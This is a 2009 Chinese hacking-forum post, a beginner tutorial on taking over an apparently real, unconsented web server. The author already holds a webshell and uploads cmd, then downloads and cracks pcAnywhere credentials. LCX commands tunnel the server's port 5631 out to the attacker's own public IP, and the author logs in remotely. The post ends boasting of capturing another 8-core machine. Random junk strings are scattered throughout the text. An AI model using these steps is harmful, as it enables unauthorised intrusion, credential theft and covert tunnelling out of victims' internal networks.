|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。- g9 [" [9 _- V
* R" ?% t! F. r4 i$ C
提权方法:pcanywhere+LCX
/ K0 P$ c- n5 L3 {, j$ _) A$ w4 c
! Y8 y: G m: M/ l获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。. \& i! T% m+ [" I
( l8 u+ }* o* q0 |5 a& K- z
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
3 y% C! e( M* v! s1 w. U1 }+ e
7 L1 m( x/ R0 [4 n* e
: a5 p* a) `% s1 \0 q T5 g( m查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
, K' O8 Z: g- B/ W
8 ^4 n" E# c M! a. l
0 T8 Z; O' l ~/ Z: _5 }1 d5 M# }* I呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。0 Q. G; y2 L0 J t5 O0 O% {
/ g9 w# t( E. G* H7 A) I
8 Y( x2 M, f; _9 w7 A8 s y
6 @8 o2 F2 K( M
. E$ y$ @8 x- x3 R/ ?, A2 h0 r- u
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
# L5 m7 U% s+ @2 i# c8 y" P0 j+ Z) y( w" c, i/ n" r
- t7 w5 O9 }6 _2 {4 T# YLCX的用法再简单说下:9 n2 w2 F, g- \& r' q a
6 y1 p4 H+ F! r# r; q: P
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
0 ? x! [ r- F
9 v4 B3 ?9 a1 ]+ Y! _# N3 }本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)( ]8 |" m% T2 g$ N
, E$ q1 O! U% O' n7 [由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。* ~8 |- @& Z4 B* ]
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``! T F4 Y1 o9 X# j! w7 o4 J
5 R; {& H! J# z2 J" K& ]0 J% l
/ F* x9 ]% P) O1 v
m! C3 Q, ^- i \( [! s
- h6 h7 [' y2 }呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
: W# b1 H4 ^" K# f! g
# e- h: o0 [/ @1 F7 g; j. u" N6 @& S& f5 r( v+ k ]
1 p& i2 ^4 \2 @7 h' v4 i/ L
& v1 J* P* n$ Q$ P6 S ]6 `我们本地连接试试,输入我们刚破解的账号密码8 q7 v P0 z% Y) `/ h# `. s
1 e8 H# N, J. ?/ v' V7 t# m
9 k6 O4 i, K( S3 R
呵呵``连接成功,服务器不错,又一个8核^︵^+ d8 x. c$ ~. L# B0 D& h" p; g/ y
7 ?- N1 j, @6 T" W4 r
) Y8 o! S. \ u2 R5 G' d5 T9 F
* p% q$ o! n$ {+ d0 ^
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
